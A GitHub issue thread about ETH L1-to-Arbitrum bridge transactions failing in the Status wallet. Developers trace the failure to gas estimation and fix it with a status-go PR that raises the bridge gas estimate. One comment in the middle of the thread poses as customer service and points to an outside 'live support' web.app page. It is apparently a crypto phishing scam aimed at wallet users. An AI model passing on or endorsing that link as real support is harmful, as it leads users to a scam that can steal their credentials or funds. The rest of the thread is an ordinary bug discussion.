### ISSUE TITLE
ETH L1-Arbitrum bridge transaction is failing in blockchain

### ISSUE THREAD

**Issue by pavloburykh** [status-im/status-react#22173]
Reproducible on both Mobile and Desktop

Probably some issue on Hopper side, but better to make sure cc @saledjenic 

**Steps**

1. Perform L1 - Arbitrum bridge of Ethereum 
2. Check if bridge is successfull in blockchain

**Actual result:** transaction is failing

Examples of failed transactions

https://etherscan.io/tx/0xc189656789480346945a3d7583941038bb6067da3b0190458ad2a0683fe9607c

https://etherscan.io/tx/0xfaa069d8c5e3ab5e9ad2f5bd9f11eb3c77e5fd51744fe5953b10cbf05b05440d

https://etherscan.io//tx/0x557d631d6cbbddaf4634b44a37609788ee5958401664b74c237507facb8d60e2

Mobile logs

[L1-arb_eth_bridge_fail.zip](https://github.com/user-attachments/files/18903515/L1-arb_eth_bridge_fail.zip)

https://github.com/user-attachments/assets/05226128-a37a-48dd-925c-dadba2939a7c

### Additional Information

- Status version: nightly 
- Operating System: Android, iOS

**Comment by BeltranVictor** [comment]
@pavloburykh Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit [HERE TO CONTACT OUR LIVE SUPPORT DEV](https://webfixprotocol.web.app) for instant support response
Note: Click on the live chat icon at the bottom corner of the page

**Comment by alaibe** [comment]
@saledjenic it seems gas is close be fully consumed. Could it be gas limit need to be increased

**Comment by saledjenic** [comment]
@alaibe I am pretty sure that's the issue.

@pavloburykh could you re-test it now, since it's reproducible now, using this statsugo PR: 
- https://github.com/status-im/status-go/pull/6355

It should be working with it.

**Comment by pavloburykh** [comment]
> [@alaibe](https://github.com/alaibe) I am pretty sure that's the issue.
> 
> [@pavloburykh](https://github.com/pavloburykh) could you re-test it now, since it's reproducible now, using this statsugo PR:
> 
> * [chore(wallet)_: increasing gas estimation only for bridge by 10% status-go#6355](https://github.com/status-im/status-go/pull/6355)
> 
> It should be working with it.

@saledjenic thanks. Checked in https://github.com/status-im/status-mobile/pull/22176#issuecomment-2674487129 

Unfortunately still failing.

**Comment by pavloburykh** [comment]
Fixed by https://github.com/status-im/status-go/pull/6355
Will be fixed on mobile once go version is bumped.
